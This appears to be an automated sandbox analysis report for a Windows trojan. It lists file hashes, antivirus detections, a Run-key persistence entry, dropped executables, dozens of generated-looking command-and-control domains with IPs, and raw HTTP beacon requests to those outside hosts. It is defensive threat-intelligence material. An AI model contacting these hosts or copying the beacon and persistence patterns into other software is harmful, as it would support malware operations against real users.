Analysis Date2015-07-29 01:15:49
MD5d96ff0fb2af92293d73eb507902e24ad
SHA1dd7e2659e0d02a79c898c15c97b1509906d29e55

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c23807ed81146a0870bb1670211bced5 sha1: 953a7302aebb73e1fc6424afb2df5030340506eb size: 296960
Section.rdata md5: b3c2d3347a368de3667058235d0f24d1 sha1: d3a9e59c0b193560603b97dfdaea32565af086cd size: 34816
Section.data md5: adc6497191d91445b7480e3517386709 sha1: 89c5fbc90799280c06b9668aa1506c0f62498d43 size: 98304
Timestamp2014-10-30 10:10:17
PackerMicrosoft Visual C++ ?.?
PEhashf07e2747cebc98dd4f41d94c5d7f35aaafd9decb
IMPhash3edd1b7d22d3819f5466ca1c222270b0
AVRisingno_virus
AVMcafeeTrojan-FEMT!D96FF0FB2AF9
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7no_virus
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Symmi.22722

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Backup IKE Protection Framework Bus ➝
C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\hvudxhs\ibzyoxv.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.q52cp
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe"

Network Details:

DNSfollownothing.net
Type: A
95.211.230.75
DNSknownstream.net
Type: A
74.208.56.10
DNSsummerstream.net
Type: A
66.96.132.53
DNScrowdstream.net
Type: A
184.168.221.61
DNScrowdnothing.net
Type: A
208.91.197.241
DNSthoughtstream.net
Type: A
50.63.202.54
DNSwaterstream.net
Type: A
91.198.165.243
DNSwaterbottle.net
Type: A
209.15.13.134
DNSfightstream.net
Type: A
184.168.221.32
DNSpartybottle.net
Type: A
91.215.216.53
DNSfreshbusiness.net
Type: A
72.52.4.120
DNSexperiencebusiness.net
Type: A
188.40.135.139
DNSfightcourse.net
Type: A
DNSpartywomen.net
Type: A
DNSfightwomen.net
Type: A
DNSfreshstream.net
Type: A
DNSexperiencestream.net
Type: A
DNSfreshnothing.net
Type: A
DNSexperiencenothing.net
Type: A
DNSfreshbottle.net
Type: A
DNSexperiencebottle.net
Type: A
DNSfreshdivide.net
Type: A
DNSexperiencedivide.net
Type: A
DNSgentlemanstream.net
Type: A
DNSalreadystream.net
Type: A
DNSgentlemannothing.net
Type: A
DNSalreadynothing.net
Type: A
DNSgentlemanbottle.net
Type: A
DNSalreadybottle.net
Type: A
DNSgentlemandivide.net
Type: A
DNSalreadydivide.net
Type: A
DNSfollowstream.net
Type: A
DNSmemberstream.net
Type: A
DNSmembernothing.net
Type: A
DNSfollowbottle.net
Type: A
DNSmemberbottle.net
Type: A
DNSfollowdivide.net
Type: A
DNSmemberdivide.net
Type: A
DNSbeginstream.net
Type: A
DNSbeginnothing.net
Type: A
DNSknownnothing.net
Type: A
DNSbeginbottle.net
Type: A
DNSknownbottle.net
Type: A
DNSbegindivide.net
Type: A
DNSknowndivide.net
Type: A
DNSsummernothing.net
Type: A
DNSsummerbottle.net
Type: A
DNScrowdbottle.net
Type: A
DNSsummerdivide.net
Type: A
DNScrowddivide.net
Type: A
DNSthoughtnothing.net
Type: A
DNSwaternothing.net
Type: A
DNSthoughtbottle.net
Type: A
DNSthoughtdivide.net
Type: A
DNSwaterdivide.net
Type: A
DNSwomanstream.net
Type: A
DNSsmokestream.net
Type: A
DNSwomannothing.net
Type: A
DNSsmokenothing.net
Type: A
DNSwomanbottle.net
Type: A
DNSsmokebottle.net
Type: A
DNSwomandivide.net
Type: A
DNSsmokedivide.net
Type: A
DNSpartystream.net
Type: A
DNSpartynothing.net
Type: A
DNSfightnothing.net
Type: A
DNSfightbottle.net
Type: A
DNSpartydivide.net
Type: A
DNSfightdivide.net
Type: A
DNSfreshmanner.net
Type: A
DNSexperiencemanner.net
Type: A
DNSfreshanother.net
Type: A
DNSexperienceanother.net
Type: A
DNSfreshappear.net
Type: A
DNSexperienceappear.net
Type: A
DNSgentlemanmanner.net
Type: A
DNSalreadymanner.net
Type: A
DNSgentlemananother.net
Type: A
DNSalreadyanother.net
Type: A
DNSgentlemanbusiness.net
Type: A
DNSalreadybusiness.net
Type: A
DNSgentlemanappear.net
Type: A
DNSalreadyappear.net
Type: A
DNSfollowmanner.net
Type: A
DNSmembermanner.net
Type: A
HTTP GEThttp://follownothing.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://knownstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://summerstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://crowdstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://crowdnothing.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://thoughtstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://waterstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://waterbottle.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://fightstream.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://partybottle.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://freshbusiness.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
HTTP GEThttp://experiencebusiness.net/index.php?email=info@dharmams.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1032 ➝ 74.208.56.10:80
Flows TCP192.168.1.1:1033 ➝ 66.96.132.53:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.61:80
Flows TCP192.168.1.1:1035 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1036 ➝ 50.63.202.54:80
Flows TCP192.168.1.1:1037 ➝ 91.198.165.243:80
Flows TCP192.168.1.1:1038 ➝ 209.15.13.134:80
Flows TCP192.168.1.1:1039 ➝ 184.168.221.32:80
Flows TCP192.168.1.1:1040 ➝ 91.215.216.53:80
Flows TCP192.168.1.1:1041 ➝ 72.52.4.120:80
Flows TCP192.168.1.1:1042 ➝ 188.40.135.139:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 6f6c6c6f 776e6f74   .Host: follownot
0x00000070 (00112)   68696e67 2e6e6574 0d0a0d0a            hing.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206b 6e6f776e 73747265   .Host: knownstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 756d6d65 72737472   .Host: summerstr
0x00000070 (00112)   65616d2e 6e65740d 0a0d0a0a            eam.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 726f7764 73747265   .Host: crowdstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 726f7764 6e6f7468   .Host: crowdnoth
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0a            ing.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 686f7567 68747374   .Host: thoughtst
0x00000070 (00112)   7265616d 2e6e6574 0d0a0d0a            ream.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 61746572 73747265   .Host: waterstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 61746572 626f7474   .Host: waterbott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0d0a            le.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 69676874 73747265   .Host: fightstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 61727479 626f7474   .Host: partybott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0d0a            le.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 72657368 62757369   .Host: freshbusi
0x00000070 (00112)   6e657373 2e6e6574 0d0a0d0a            ness.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 78706572 69656e63   .Host: experienc
0x00000070 (00112)   65627573 696e6573 732e6e65 740d0a0d   ebusiness.net...
0x00000080 (00128)   0a                                    .


Strings